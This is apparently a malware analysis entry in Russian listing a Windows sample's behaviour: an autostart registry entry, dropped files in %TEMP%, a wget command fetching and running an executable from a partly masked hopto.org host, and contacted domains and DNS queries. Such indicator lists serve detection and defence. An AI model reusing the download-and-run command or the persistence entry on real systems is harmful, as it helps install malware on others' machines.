Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'DevidAgent' = '%TEMP%\1.tmp\devid.exe /autorun'
- %TEMP%\1.tmp\wget.exe "http://lo###.hopto.org/mw.exe" --output-document="%TEMP%\mw.exe"
- %TEMP%\mw.exe
- %TEMP%\1.tmp\devid.exe
- %TEMP%\1.tmp\wa.exe /s
- %TEMP%\mw.exe (загружен из сети Интернет)
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\install.bat" "
- %TEMP%\1.tmp\devid.exe
- %TEMP%\mw.exe
- %TEMP%\1.tmp\wget.exe
- %TEMP%\1.tmp\install.bat
- %TEMP%\1.tmp\wa.exe
- %TEMP%\1.tmp\devid.exe
- %TEMP%\1.tmp\install.bat
- %TEMP%\1.tmp\wa.exe
- %TEMP%\1.tmp\wget.exe
- 'in####l.ticno.com':80
- 'de##d.info':80
- 'lo###.hopto.org':80
- '74.##5.232.51':80
- in####l.ticno.com/10/?wm############################################################
- in####l.ticno.com/feed/feed_en.xml
- lo###.hopto.org/mw.exe
- de##d.info/xmlsearch/checkcompatibility
- DNS ASK in####l.ticno.com
- DNS ASK de##d.info
- DNS ASK lo###.hopto.org
- DNS ASK google.com
- ClassName: 'Indicator' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''